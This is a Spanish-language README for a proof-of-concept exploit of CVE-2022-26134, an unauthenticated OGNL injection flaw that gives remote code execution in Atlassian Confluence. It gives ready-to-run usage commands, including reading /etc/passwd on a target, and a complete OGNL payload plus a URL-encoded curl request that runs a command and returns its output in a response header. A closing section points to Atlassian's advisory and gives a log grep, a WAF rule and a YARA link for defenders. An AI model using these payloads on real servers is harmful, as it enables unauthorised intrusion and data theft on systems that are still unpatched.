
Atlassian Confluence (CVE-2022-26134) - Vulnerabilidad de inyección OGNL no autenticada (RCE).
Script de prueba de concepto que explota la vulnerabilidad de ejecución remota de código que afecta a Atlassian Confluence 7.18 y versiones anteriores. La vulnerabilidad de inyección OGNL permite a un usuario no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center.
Todas las versiones compatibles de Confluence Server y Data Center están afectadas.
Las versiones de Confluence Server y Data Center posteriores a 1.3.0 e inferiores a 7.18.1 están afectadas.
La vulnerabilidad tiene una puntuación CVSS de 10 sobre 10 en criticidad.
pip install -r requirements.txt
Clona el repositorio:
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
Luego puedes ejecutar el exploit con el comando de tu elección de la siguiente manera:
python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Luego, el resultado del comando se reflejará en el parámetro X-Cmd-Response en la cabecera de respuesta.
Sigue las recomendaciones oficiales de Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian ha publicado un aviso para sus productos afectados por este CVE, que puedes leer aquí. Para resolver el problema, debes actualizar tu versión de Confluence. La lista sugerida en el momento de la publicación es:
Confluence es un servidor Apache Tomcat que tiene registros en /opt/atlassian/confluence/logs. Puedes usar comandos como grep para buscar solicitudes HTTP GET de payloads que utilicen el runtime de Java para ejecutar comandos. Por ejemplo:
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" en catalina.out
Esta vulnerabilidad afecta a todas las instancias autoalojadas. Si usas un WAF, puedes bloquear URLs que contengan ${ dentro.
YARA (por Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
SOLO CON FINES EDUCATIVOS.
